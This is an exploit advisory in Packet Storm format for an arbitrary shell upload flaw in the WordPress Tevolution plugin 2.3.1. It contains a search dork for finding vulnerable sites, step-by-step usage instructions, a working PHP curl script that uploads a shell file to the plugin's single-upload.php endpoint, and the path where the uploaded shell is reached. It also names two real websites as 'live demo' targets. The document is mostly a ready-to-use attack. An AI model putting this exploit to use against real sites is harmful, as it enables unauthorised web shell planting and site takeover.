WordPress Tevolution 2.3.1 Shell Upload

2016-08-16T00:00:00
ID PACKETSTORM:138351
Type packetstorm
Reporter xBADGIRL21
Modified 2016-08-16T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability  
# Exploit Author : xBADGIRL21  
# Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector  
# Vendor Homepage : https://templatic.com/  
# version : 2.3.1  
# Tested on: [ BackBox ]  
# skype:xbadgirl21  
# Date: 15/08/2016  
# video Proof : https://youtu.be/eVjW6rnaoSY  
######################  
# [+] DESCRIPTION :  
######################  
# [+] The Tevolution WordPress plugin enables advanced functionality in our themes.  
# [+] Some of the features it enables include custom post types, monetization options, custom fieldsa|  
# [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.  
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory  
######################  
# [+] USAGE :  
######################  
# 1.- Download or Copy the Exploit C0des  
# 2.- Use Dork and Choose One Of the Website  
# 3.- Edit The Script  
# 4.- Upload Your File : shell.php.jpg or shell.php.txt  
######################  
# [+] Exploit:  
######################  
<?php  
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean  
you are the Founder or Owner of this ^_^  
$ch = curl_init("  
http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php  
");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('file'=>"@$uploadfile"));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
?>  
######################  
# [+] Dev!l Path :  
######################  
#  
http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt  
######################  
# [+] Live Demo :  
######################  
# http://guiagronicaragua.com  
# http://eventsinsuriname.com  
######################  
# Discovered by : xBADGIRL21 - Unkn0wN  
# Greetz : All Mauritanien Hackers - NoWhere  
#######################  
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't  
Want me to Write His Name  
# so I Just Write the Exploit C0des ...........  
#######################  
`